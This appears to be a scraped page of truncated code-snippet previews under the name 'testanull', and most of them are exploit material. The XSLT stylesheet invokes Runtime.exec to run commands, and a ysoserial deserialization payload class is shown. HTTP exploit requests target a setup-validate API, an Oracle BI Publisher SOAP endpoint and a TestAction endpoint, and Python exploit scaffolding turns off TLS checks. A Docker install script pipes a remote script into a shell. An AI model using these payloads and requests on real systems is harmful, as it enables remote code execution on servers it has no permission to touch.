testanull

#!/bin/bash
sudo su
wget -qO- https://get.docker.com/ | sh
COMPOSE_VERSION=`git ls-remote https://github.com/docker/compose | grep refs/tags | grep -oE "[0-9]+\.[0-9][0-9]+\.[0-9]+$" | sort --version-sort | tail -n 2 | head -n 1`
sudo sh -c "curl -L https://github.com/docker/compose/releases/download/v${COMPOSE_VERSION}/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose"
sudo chmod +x /usr/local/bin/docker-compose

# You're good to go, no more 404 not found!

testanull

POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Content-Length: 416
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0 
Connection: close

{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{
"subprotocol":"h2",

testanull

def parseNtlmMsg(msg):
	def decode_int(byte_string):
		return int(byte_string[::-1].encode('hex'), 16)

	def decode_string(byte_string):
		return byte_string.replace('\x00', '')

	target_info_fields  = msg[40:48]
	target_info_len     = decode_int(target_info_fields[0:2])
	target_info_offset  = decode_int(target_info_fields[4:8])

testanull

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
	<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
	<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
	<!-- #114 Utf8: open -a calculator -->
	<!-- #115 String: touch /tmp/pwn -->
	<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
	<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
	<!-- #132 Utf8: <init> -->
	<AAA select="&lt;init&gt;"/>

testanull

import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def id_generator(size=6, chars=string.ascii_lowercase + string.digits):

testanull

POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: 192.168.139.212
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 1317

<?xml version="1.0"?>
<soap-env:Envelope

testanull

public class JavaCharStream
{
public char readChar() throws java.io.IOException
  {
   //truncated
              if ((buffer[bufpos] = c = ReadByte()) != '\\')
              {
                 UpdateLineColumn(c);
                 // found a non-backslash char.
                 if ((c == 'u') && ((backSlashCnt & 1) == 1))

testanull

package ysoserial.payloads;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.connector.Response;
import org.apache.catalina.connector.ResponseFacade;
import org.apache.catalina.core.ApplicationFilterChain;

testanull

POST /api/Action/TestAction HTTP/1.1
Host: <target>
Content-Length: 3978
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: <token>
X-Requested-With: XMLHttpRequest
ViewLimitationID: 0
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Cookie: <cookie>

testanull

import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)